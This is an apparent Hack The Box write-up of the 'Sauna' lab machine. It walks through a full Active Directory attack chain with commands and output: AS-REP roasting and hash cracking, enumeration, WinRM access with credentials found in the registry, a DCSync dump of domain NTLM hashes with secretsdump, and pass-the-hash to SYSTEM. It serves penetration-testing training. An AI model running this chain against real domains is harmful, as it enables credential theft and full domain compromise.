Back when I did this box 2 years ago, I used commands like type to look at the content of files, or normal command-line commands within powershell, as well as Metasploit. As I am redoing some sections for documentation purposes, I will use a different approach, such as using powershell commands, and avoid relying on methods that might not be helpful when going through exams like the OSCP.
Let's face it, writing documentation from something you wrote and worked on two years ago can be a headache.
Sauna can be a good HTB box to practice your enumeration process, both remote and local, as you can find what you need to do by carefully assessing the services and the system itself. It never hurts anyone to be thorough when enumerating.
References:
Enumeration
Finding Open Ports
To gather information about this machine, we start by finding any TCP/UDP open ports using masscan.
┌──(jxberrios 👿 back0ff)-[~/…/Sauna]
└─$ sudo masscan -e tun1 -p1-65535,U:1-65535 10.10.10.175 --rate=1000 | tee Sauna-masscan.log
Starting masscan 1.0.5 (http://bit.ly/14GZzcT) at 2020-02-15 19:57:41 GMT
-- forced options: -sS -Pn -n --randomize-hosts -v --send-eth
Initiating SYN Stealth Scan
Scanning 1 hosts [131070 ports/host]
Discovered open port 53/udp on 10.10.10.175
Discovered open port 636/tcp on 10.10.10.175
Discovered open port 135/tcp on 10.10.10.175
Discovered open port 389/tcp on 10.10.10.175
Discovered open port 49667/tcp on 10.10.10.175
Discovered open port 139/tcp on 10.10.10.175
Discovered open port 445/tcp on 10.10.10.175
Discovered open port 88/tcp on 10.10.10.175
Discovered open port 49669/tcp on 10.10.10.175
Discovered open port 9389/tcp on 10.10.10.175
Discovered open port 464/tcp on 10.10.10.175
Discovered open port 3269/tcp on 10.10.10.175
Discovered open port 49671/tcp on 10.10.10.175
Discovered open port 52250/tcp on 10.10.10.175
Discovered open port 80/tcp on 10.10.10.175
Discovered open port 5985/tcp on 10.10.10.175
Discovered open port 3268/tcp on 10.10.10.175
Discovered open port 593/tcp on 10.10.10.175
Discovered open port 49682/tcp on 10.10.10.175
Discovered open port 53/tcp on 10.10.10.175
Discovered open port 49670/tcp on 10.10.10.175
Port Scanning
To further get more information about these open ports we found, we used nmap SYN scan (-sS) with default script execution (-sC) and service version enumeration (-sV).
Before we do this, we gathered in a variable (PORTS) a list of the TCP ports found open to then use it for our scan. This step is not necessary but helpful.
┌──(jxberrios 👿 back0ff)-[~/…/Sauna]
└─$ PORTS=$(cat Sauna-masscan.log | grep tcp | cut -d ' ' -f 4 | cut -d '/' -f 1 | xargs | tr ' ' ',')
┌──(jxberrios 👿 back0ff)-[~/…/Sauna]
└─$ sudo nmap -Pn -sS -sC -sV -p $PORTS --min-rate=1000 -T4 sauna.htb
[sudo] password for jxberrios:
Starting Nmap 7.92 ( https://nmap.org ) at 2022-04-14 01:19 EDT
Nmap scan report for sauna.htb (10.10.10.175)
Host is up (0.040s latency).
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft IIS httpd 10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-title: Egotistical Bank :: Home
|_http-server-header: Microsoft-IIS/10.0
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2022-04-14 12:18:06Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf .NET Message Framing
49667/tcp open msrpc Microsoft Windows RPC
49669/tcp filtered unknown
49670/tcp filtered unknown
49671/tcp filtered unknown
49682/tcp filtered unknown
52250/tcp filtered unknown
Service Info: Host: SAUNA; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2022-04-14T12:18:59
|_ start_date: N/A
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled and required
|_clock-skew: 6h58m39s
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 97.50 seconds
From the service found, whenever LDAP(s) or SMB are accessible, I try to target these service first instead of going for others like HTTP. These services are known to be misconfigured frequently and allow access with no authentication.
Enumerating LDAP
While enumerating LDAP, we try to define the scope and reduce the data returned while providing necessary information. Here, we pulled the naming context information as well as the DNs available.
Now that we found the 'CN=Hugo Smith,DC=EGOTISTICAL-BANK,DC=LOCAL' distinguished name, we have to try using it.
We don't have a definitive samAccountName to go by, but from all the possible username combinations we could come up with, hsmith seemed to give a different response when trying to check for Kerberos Pre-Authentication with GetNPUsers.
┌──(jxberrios 👿 back0ff)-[~/…/Sauna]
└─$ impacket-GetNPUsers -no-pass -dc-ip sauna.htb EGOTISTICALBANK/hsmith
Impacket v0.9.20 - Copyright 2019 SecureAuth Corporation
[*] Getting TGT for hsmith
[-] User hsmith doesn't have UF_DONT_REQUIRE_PREAUTH set
Given this information, we should go to the web service available:
The /about.html page shows the company employees, which could be Active Directory users as well. At the same time, oddly enough, it shows two users, 'Hugo Bear' and 'Fergus Smith', but no 'Hugo Smith'.
Given this information, we should attempt to use hbear and fsmith.
Exploitation and Gaining Access
Using Impacket's GetNPUsers
Knowing that the samAccountName valid for Hugo Smith is hsmith, we tried hbear with no success as it seems to not exist, so let's try fsmith and see if we get a Kerberos TGT by doing ASREPRoast attack.
AND we found a valid Kerberos Ticket. Let's try and crack it with John The Ripper.
Using John The Ripper
This step is self-explanatory. We are relying on a password/hash cracking tool to get fsmith's password by cracking the Kerberos Ticket from our previous Kerberoasting step.
┌──(jxberrios 👿 back0ff)-[~/…/Sauna]
└─$ john --wordlist=/usr/share/wordlists/rockyou.txt sauna_krb.txt > saunaCreds.txt
Using default input encoding: UTF-8
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
1g 0:00:00:12 DONE (2020-02-16 13:03) 0.07923g/s 835103p/s 835103c/s 835103C/s Thrall..Thehunter22
Use the "--show" option to display all of the cracked passwords reliably
Session completed
jxberrios@back0ff:~/Documents/HTB-Labs/Sauna$ cat saunaCreds.txt
Loaded 1 password hash (krb5asrep, Kerberos 5 AS-REP etype 17/18/23 [MD4 HMAC-MD5 RC4 / PBKDF2 HMAC-SHA1 AES 256/256 AVX2 8x])
Thestrokes23 ($krb5asrep$23$fsmith@EGOTISTICALBANK)
Using Enum4Linux
With these credentials, let's keep enumerating with enum4linux, and try to gather user and group membership, operating system and share information.
┌──(jxberrios 👿 back0ff)-[~/…/Sauna]
└─$ enum4linux -U -G -S -r -o -u fsmith -p Thestrokes23 -w EGOTISTICALBANK sauna.htb
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Sun Feb 16 13:05:49 2020
=========================================( Target Information )=========================================
Target ........... sauna.htb
RID Range ........ 500-550,1000-1050
Username ......... 'fsmith'
Password ......... 'Thestrokes23'
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none
=============================( Enumerating Workgroup/Domain on sauna.htb )=============================
[+] Got domain/workgroup name: EGOTISTICALBANK
=====================================( Session Check on sauna.htb )=====================================
[+] Server sauna.htb allows sessions using username 'fsmith', password 'Thestrokes23'
==================================( Getting domain SID for sauna.htb )==================================
Domain Name: EGOTISTICALBANK
Domain Sid: S-1-5-21-2966785786-3096785034-1186376766
[+] Host is part of a domain (not a workgroup)
====================================( OS information on sauna.htb )====================================
[E] Can't get OS info with smbclient
[+] Got OS info for sauna.htb from srvinfo:
SAUNA.HTB Wk Sv PDC Tim PrQ NT SAUNA
platform_id : 500
os version : 10.0
server type : 0x80122b
=========================================( Users on sauna.htb )=========================================
index: 0xeda RID: 0x1f4 acb: 0x00000210 Account: Administrator Name: (null) Desc: Built-in account for administering the computer/domain
index: 0xfaf RID: 0x451 acb: 0x00010210 Account: FSmith Name: Fergus Smith Desc: (null)
index: 0xedb RID: 0x1f5 acb: 0x00000215 Account: Guest Name: (null) Desc: Built-in account for guest access to the computer/domain
index: 0xfad RID: 0x44f acb: 0x00000210 Account: HSmith Name: Hugo Smith Desc: (null)
index: 0xf10 RID: 0x1f6 acb: 0x00020011 Account: krbtgt Name: (null) Desc: Key Distribution Center Service Account
index: 0xfb6 RID: 0x454 acb: 0x00000210 Account: svc_loanmgr Name: L Manager Desc: (null)
user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
user:[krbtgt] rid:[0x1f6]
user:[HSmith] rid:[0x44f]
user:[FSmith] rid:[0x451]
user:[svc_loanmgr] rid:[0x454]
===================================( Share Enumeration on sauna.htb )===================================
do_connect: Connection to sauna.htb failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
print$ Disk Printer Drivers
RICOH Aficio SP 8300DN PCL 6 Printer We cant print money
SYSVOL Disk Logon server share
Reconnecting with SMB1 for workgroup listing.
Unable to connect with SMB1 -- no workgroup available
[+] Attempting to map shares on sauna.htb
//sauna.htb/ADMIN$ Mapping: DENIED Listing: N/A Writing: N/A
//sauna.htb/C$ Mapping: DENIED Listing: N/A Writing: N/A
[E] Can't understand response:
NT_STATUS_INVALID_INFO_CLASS listing \*
//sauna.htb/IPC$ Mapping: N/A Listing: N/A Writing: N/A
//sauna.htb/NETLOGON Mapping: OK Listing: OK Writing: N/A
//sauna.htb/print$ Mapping: OK Listing: OK Writing: N/A
[E] Can't understand response:
NT_STATUS_OBJECT_NAME_NOT_FOUND listing \*
//sauna.htb/RICOH Aficio SP 8300DN PCL 6 Mapping: N/A Listing: N/A Writing: N/A
//sauna.htb/SYSVOL Mapping: OK Listing: OK Writing: N/A
========================================( Groups on sauna.htb )========================================
[+] Getting builtin groups:
group:[Server Operators] rid:[0x225]
group:[Account Operators] rid:[0x224]
group:[Pre-Windows 2000 Compatible Access] rid:[0x22a]
group:[Incoming Forest Trust Builders] rid:[0x22d]
group:[Windows Authorization Access Group] rid:[0x230]
group:[Terminal Server License Servers] rid:[0x231]
group:[Administrators] rid:[0x220]
group:[Users] rid:[0x221]
group:[Guests] rid:[0x222]
group:[Print Operators] rid:[0x226]
group:[Backup Operators] rid:[0x227]
group:[Replicator] rid:[0x228]
group:[Remote Desktop Users] rid:[0x22b]
group:[Network Configuration Operators] rid:[0x22c]
group:[Performance Monitor Users] rid:[0x22e]
group:[Performance Log Users] rid:[0x22f]
group:[Distributed COM Users] rid:[0x232]
group:[IIS_IUSRS] rid:[0x238]
group:[Cryptographic Operators] rid:[0x239]
group:[Event Log Readers] rid:[0x23d]
group:[Certificate Service DCOM Access] rid:[0x23e]
group:[RDS Remote Access Servers] rid:[0x23f]
group:[RDS Endpoint Servers] rid:[0x240]
group:[RDS Management Servers] rid:[0x241]
group:[Hyper-V Administrators] rid:[0x242]
group:[Access Control Assistance Operators] rid:[0x243]
group:[Remote Management Users] rid:[0x244]
group:[Storage Replica Administrators] rid:[0x246]
[+] Getting builtin group memberships:
Group: Pre-Windows 2000 Compatible Access' (RID: 554) has member: NT AUTHORITY\Authenticated Users
Group: Remote Management Users' (RID: 580) has member: EGOTISTICALBANK\FSmith
Group: Remote Management Users' (RID: 580) has member: EGOTISTICALBANK\svc_loanmgr
Group: Users' (RID: 545) has member: NT AUTHORITY\INTERACTIVE
Group: Users' (RID: 545) has member: NT AUTHORITY\Authenticated Users
Group: Users' (RID: 545) has member: EGOTISTICALBANK\Domain Users
Group: Administrators' (RID: 544) has member: EGOTISTICALBANK\Administrator
Group: Administrators' (RID: 544) has member: EGOTISTICALBANK\Enterprise Admins
Group: Administrators' (RID: 544) has member: EGOTISTICALBANK\Domain Admins
Group: Guests' (RID: 546) has member: EGOTISTICALBANK\Guest
Group: Guests' (RID: 546) has member: EGOTISTICALBANK\Domain Guests
Group: Windows Authorization Access Group' (RID: 560) has member: NT AUTHORITY\ENTERPRISE DOMAIN CONTROLLERS
[+] Getting local groups:
group:[Cert Publishers] rid:[0x205]
group:[RAS and IAS Servers] rid:[0x229]
group:[Allowed RODC Password Replication Group] rid:[0x23b]
group:[Denied RODC Password Replication Group] rid:[0x23c]
group:[DnsAdmins] rid:[0x44d]
[+] Getting local group memberships:
Group: Denied RODC Password Replication Group' (RID: 572) has member: EGOTISTICALBANK\krbtgt
Group: Denied RODC Password Replication Group' (RID: 572) has member: EGOTISTICALBANK\Domain Controllers
Group: Denied RODC Password Replication Group' (RID: 572) has member: EGOTISTICALBANK\Schema Admins
Group: Denied RODC Password Replication Group' (RID: 572) has member: EGOTISTICALBANK\Enterprise Admins
Group: Denied RODC Password Replication Group' (RID: 572) has member: EGOTISTICALBANK\Cert Publishers
Group: Denied RODC Password Replication Group' (RID: 572) has member: EGOTISTICALBANK\Domain Admins
Group: Denied RODC Password Replication Group' (RID: 572) has member: EGOTISTICALBANK\Group Policy Creator Owners
Group: Denied RODC Password Replication Group' (RID: 572) has member: EGOTISTICALBANK\Read-only Domain Controllers
[+] Getting domain groups:
group:[Enterprise Read-only Domain Controllers] rid:[0x1f2]
group:[Domain Admins] rid:[0x200]
group:[Domain Users] rid:[0x201]
group:[Domain Guests] rid:[0x202]
group:[Domain Computers] rid:[0x203]
group:[Domain Controllers] rid:[0x204]
group:[Schema Admins] rid:[0x206]
group:[Enterprise Admins] rid:[0x207]
group:[Group Policy Creator Owners] rid:[0x208]
group:[Read-only Domain Controllers] rid:[0x209]
group:[Cloneable Domain Controllers] rid:[0x20a]
group:[Protected Users] rid:[0x20d]
group:[Key Admins] rid:[0x20e]
group:[Enterprise Key Admins] rid:[0x20f]
group:[DnsUpdateProxy] rid:[0x44e]
[+] Getting domain group memberships:
Group: 'Schema Admins' (RID: 518) has member: EGOTISTICALBANK\Administrator
Group: 'Enterprise Admins' (RID: 519) has member: EGOTISTICALBANK\Administrator
Group: 'Domain Users' (RID: 513) has member: EGOTISTICALBANK\Administrator
Group: 'Domain Users' (RID: 513) has member: EGOTISTICALBANK\krbtgt
Group: 'Domain Users' (RID: 513) has member: EGOTISTICALBANK\HSmith
Group: 'Domain Users' (RID: 513) has member: EGOTISTICALBANK\FSmith
Group: 'Domain Users' (RID: 513) has member: EGOTISTICALBANK\svc_loanmgr
Group: 'Group Policy Creator Owners' (RID: 520) has member: EGOTISTICALBANK\Administrator
Group: 'Domain Guests' (RID: 514) has member: EGOTISTICALBANK\Guest
Group: 'Domain Admins' (RID: 512) has member: EGOTISTICALBANK\Administrator
Group: 'Domain Controllers' (RID: 516) has member: EGOTISTICALBANK\SAUNA$
====================( Users on sauna.htb via RID cycling (RIDS: 500-550,1000-1050) )====================
[I] Found new SID:
S-1-5-21-2966785786-3096785034-1186376766
[I] Found new SID:
S-1-5-21-2966785786-3096785034-1186376766
[I] Found new SID:
S-1-5-32
[I] Found new SID:
S-1-5-32
[I] Found new SID:
S-1-5-32
[I] Found new SID:
S-1-5-32
[I] Found new SID:
S-1-5-32
[I] Found new SID:
S-1-5-32
[I] Found new SID:
S-1-5-32
[I] Found new SID:
S-1-5-32
[+] Enumerating users using SID S-1-5-21-2957739120-1979133213-3197504660 and logon username 'fsmith', password 'Thestrokes23'
S-1-5-21-2957739120-1979133213-3197504660-500 SAUNA\Administrator (Local User)
S-1-5-21-2957739120-1979133213-3197504660-501 SAUNA\Guest (Local User)
S-1-5-21-2957739120-1979133213-3197504660-503 SAUNA\DefaultAccount (Local User)
S-1-5-21-2957739120-1979133213-3197504660-504 SAUNA\WDAGUtilityAccount (Local User)
S-1-5-21-2957739120-1979133213-3197504660-513 SAUNA\None (Domain Group)
[+] Enumerating users using SID S-1-5-90 and logon username 'fsmith', password 'Thestrokes23'
[+] Enumerating users using SID S-1-5-80 and logon username 'fsmith', password 'Thestrokes23'
[+] Enumerating users using SID S-1-5-21-2966785786-3096785034-1186376766 and logon username 'fsmith', password 'Thestrokes23'
S-1-5-21-2966785786-3096785034-1186376766-500 EGOTISTICALBANK\Administrator (Local User)
S-1-5-21-2966785786-3096785034-1186376766-501 EGOTISTICALBANK\Guest (Local User)
S-1-5-21-2966785786-3096785034-1186376766-502 EGOTISTICALBANK\krbtgt (Local User)
S-1-5-21-2966785786-3096785034-1186376766-512 EGOTISTICALBANK\Domain Admins (Domain Group)
S-1-5-21-2966785786-3096785034-1186376766-513 EGOTISTICALBANK\Domain Users (Domain Group)
S-1-5-21-2966785786-3096785034-1186376766-514 EGOTISTICALBANK\Domain Guests (Domain Group)
S-1-5-21-2966785786-3096785034-1186376766-515 EGOTISTICALBANK\Domain Computers (Domain Group)
S-1-5-21-2966785786-3096785034-1186376766-516 EGOTISTICALBANK\Domain Controllers (Domain Group)
S-1-5-21-2966785786-3096785034-1186376766-517 EGOTISTICALBANK\Cert Publishers (Local Group)
S-1-5-21-2966785786-3096785034-1186376766-518 EGOTISTICALBANK\Schema Admins (Domain Group)
S-1-5-21-2966785786-3096785034-1186376766-519 EGOTISTICALBANK\Enterprise Admins (Domain Group)
S-1-5-21-2966785786-3096785034-1186376766-520 EGOTISTICALBANK\Group Policy Creator Owners (Domain Group)
S-1-5-21-2966785786-3096785034-1186376766-521 EGOTISTICALBANK\Read-only Domain Controllers (Domain Group)
S-1-5-21-2966785786-3096785034-1186376766-522 EGOTISTICALBANK\Cloneable Domain Controllers (Domain Group)
S-1-5-21-2966785786-3096785034-1186376766-525 EGOTISTICALBANK\Protected Users (Domain Group)
S-1-5-21-2966785786-3096785034-1186376766-526 EGOTISTICALBANK\Key Admins (Domain Group)
S-1-5-21-2966785786-3096785034-1186376766-527 EGOTISTICALBANK\Enterprise Key Admins (Domain Group)
S-1-5-21-2966785786-3096785034-1186376766-1000 EGOTISTICALBANK\SAUNA$ (Local User)
[+] Enumerating users using SID S-1-5-80-3139157870-2983391045-3678747466-658725712 and logon username 'fsmith', password 'Thestrokes23'
[+] Enumerating users using SID S-1-5-82-3006700770-424185619-1745488364-794895919 and logon username 'fsmith', password 'Thestrokes23'
[+] Enumerating users using SID S-1-5-32 and logon username 'fsmith', password 'Thestrokes23'
S-1-5-32-544 BUILTIN\Administrators (Local Group)
S-1-5-32-545 BUILTIN\Users (Local Group)
S-1-5-32-546 BUILTIN\Guests (Local Group)
S-1-5-32-548 BUILTIN\Account Operators (Local Group)
S-1-5-32-549 BUILTIN\Server Operators (Local Group)
S-1-5-32-550 BUILTIN\Print Operators (Local Group)
enum4linux complete on Feb 16 13:16:49 2020
At this point, we have a list of users (local and domain), groups, shares, and other useful information. While at it, if we pay close attention, we notice fsmith cannot be used to access the system using SMB.
Also, we noticed the both fsmith and svc_loanmgr are members of the Remote Management Users group, which means both have access to WinRM.
Sample output:
Group: Remote Management Users' (RID: 580) has member: EGOTISTICALBANK\FSmith
Group: Remote Management Users' (RID: 580) has member: EGOTISTICALBANK\svc_loanmgr
Given that gaining access through SMB is out of the question, we should attempt through WinRM.
Now that we are in the system, let's look at any paths to escalate privileges. Given that we have some domain accounts as well as local, we will need to do some more local enumeration.
Let's first use SharpHound and retrieve the data for further review:
*Evil-WinRM* PS C:\Users\FSmith\Downloads> upload /opt/BloodHound/Ingestors/SharpHound.exe
Info: Uploading /opt/BloodHound/Ingestors/SharpHound.exe to C:\Users\FSmith\Downloads\SharpHound.exe
Data: 1111380 bytes of 1111380 bytes copied
Info: Upload successful!
*Evil-WinRM* PS C:\Users\FSmith\Downloads> .\SharpHound.exe --domain EGOTISTICALBANK --ldapusername fsmith --ldappassword Thestrokes23 --collectionmethod All --collectallproperties --zipfilename ADExtract.zip
-----------------------------------------------
Initializing SharpHound at 3:22 AM on 4/14/2022
-----------------------------------------------
Resolved Collection Methods: Group, Sessions, LoggedOn, Trusts, ACL, ObjectProps, LocalGroups, SPNTargets, Container
[+] Creating Schema map for domain EGOTISTICAL-BANK.LOCAL using path CN=Schema,CN=Configuration,DC=EGOTISTICAL-BANK,DC=LOCAL
[+] Cache File not Found: 0 Objects in cache
[+] Pre-populating Domain Controller SIDS
Status: 0 objects finished (+0) -- Using 19 MB RAM
Status: 60 objects finished (+60 ì)/s -- Using 27 MB RAM
Enumeration finished in 00:00:00.3175357
Compressing data to .\20220414032226_ADExtract.zip
You can upload this file directly to the UI
SharpHound Enumeration Completed at 3:22 AM on 4/14/2022! Happy Graphing!
Continuing with some manual enumeration:
*Evil-WinRM* PS C:\Users\svc_loanmgr\Documents> net user /domain
User accounts for \\
-------------------------------------------------------------------------------
Administrator FSmith Guest
HSmith krbtgt svc_loanmgr
The command completed with one or more errors.
From these accounts, we know already fsmith, so we only have hsmith and svc_loanmgr left to look at.
*Evil-WinRM* PS C:\Users\FSmith\Desktop> net user hsmith
User name HSmith
Full Name Hugo Smith
Comment
User's comment
Country/region code 000 (System Default)
Account active Yes
Account expires Never
Password last set 1/22/2020 10:54:34 PM
Password expires Never
Password changeable 1/23/2020 10:54:34 PM
Password required Yes
User may change password Yes
Workstations allowed All
Logon script
User profile
Home directory
Last logon Never
Logon hours allowed All
Local Group Memberships
Global Group memberships *Domain Users
The command completed successfully.
*Evil-WinRM* PS C:\Users\FSmith\Desktop> net user svc_loanmgr
User name svc_loanmgr
Full Name L Manager
Comment
User's comment
Country/region code 000 (System Default)
Account active Yes
Account expires Never
Password last set 1/24/2020 4:48:31 PM
Password expires Never
Password changeable 1/25/2020 4:48:31 PM
Password required Yes
User may change password Yes
Workstations allowed All
Logon script
User profile
Home directory
Last logon Never
Logon hours allowed All
Local Group Memberships *Remote Management Use
Global Group memberships *Domain Users
The command completed successfully.
Between these two accounts, we can tell already from our remote enumeration that svc_loanmgr is a member of the Remote Management Users group but both can authenticate against the domain.
Let's try to find out if any cached credentials exist by looking at the Winlogon registry key:
And we immediately notice credentials in the registry when looking for cache credential counts.
We can attempt to use them to authenticate through WinRM but we need to use svc_loanmgr instead of svc_loanmanager used in the registry key value DefaultUserName as it does not exist, check the accounts privileges.
┌──(jxberrios 👿 back0ff)-[~/…/Sauna]
└─$ evil-winrm -i sauna.htb -u svc_loanmgr -p 'Moneymakestheworldgoround!'
Evil-WinRM shell v3.3
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\svc_loanmgr\Documents> whoami /all
USER INFORMATION
----------------
User Name SID
=========================== ==============================================
egotisticalbank\svc_loanmgr S-1-5-21-2966785786-3096785034-1186376766-1108
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
=========================================== ================ ============ ==================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users Alias S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Plus Mandatory Level Label S-1-16-8448
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== =======
SeMachineAccountPrivilege Add workstations to domain Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
USER CLAIMS INFORMATION
-----------------------
User claims unknown.
Kerberos support for Dynamic Access Control on this device has been disabled.
We don't see much here, but from what we found out through Bloodhound, svc_loanmgr has DCSync rights, let's take a look at the Bloodhound query and what Powersploit's PowerView provides.
Using BloodHound
Here, we use Bloodhound and the data retrieved previously from SharpHound.
The screenshot above shows the DCSync rights svc_loanmgr has, which are GetChanges and GetChangesAll. These ACLs are the same the Administrators, Enterprise Domain Controllers and Domain Controllers group members have.
PowerView also shows we have DCSync access as svc_loanmgr. Let's move forward and retrieve the NTLM hashes.
Using Impacket's Secretsdump
┌──(jxberrios 👿 back0ff)-[~/…/Sauna]
└─$ impacket-secretsdump -just-dc-ntlm EGOTISTICALBANK/svc_loanmgr@sauna.htb
Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation
Password:
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:823452073d75b9d1cf70ebdf86c7f98e:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:4a8899428cad97676ff802229e466e2c:::
EGOTISTICAL-BANK.LOCAL\HSmith:1103:aad3b435b51404eeaad3b435b51404ee:58a52d36c84fb7f5f1beab9a201db1dd:::
EGOTISTICAL-BANK.LOCAL\FSmith:1105:aad3b435b51404eeaad3b435b51404ee:58a52d36c84fb7f5f1beab9a201db1dd:::
EGOTISTICAL-BANK.LOCAL\svc_loanmgr:1108:aad3b435b51404eeaad3b435b51404ee:9cb31797c39a9b170b04058ba2bba48c:::
SAUNA$:1000:aad3b435b51404eeaad3b435b51404ee:0067e5a87f8d378e81c6f674d49bb841:::
[*] Cleaning up...
Right there, we were able to extract the Administrator's NTLM hash from ntds.dit. Now we can use this hash to authenticate as the Administrator user through a Pass-the-Hash attack.
┌──(jxberrios 👿 back0ff)-[~/…/Sauna]
└─$ impacket-smbexec -hashes 'aad3b435b51404eeaad3b435b51404ee:823452073d75b9d1cf70ebdf86c7f98e' EGOTISTICALBANK/Administrator@sauna.htb
Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation
[!] Launching semi-interactive shell - Careful what you execute
C:\Windows\system32>whoami
nt authority\system
C:\Windows\system32>cd c:\Users
[-] You can't CD under SMBEXEC. Use full paths.
C:\Windows\system32>dir "C:\Users\Administrator\Desktop"
Volume in drive C has no label.
Volume Serial Number is 489C-D8FC
Directory of C:\Users\Administrator\Desktop
07/14/2021 03:35 PM <DIR> .
07/14/2021 03:35 PM <DIR> ..
04/14/2022 02:08 AM 34 root.txt
1 File(s) 34 bytes
2 Dir(s) 7,821,971,456 bytes free
C:\Windows\system32>type "C:\Users\Administrator\Desktop\root.txt"
30f4bd********************312ab8
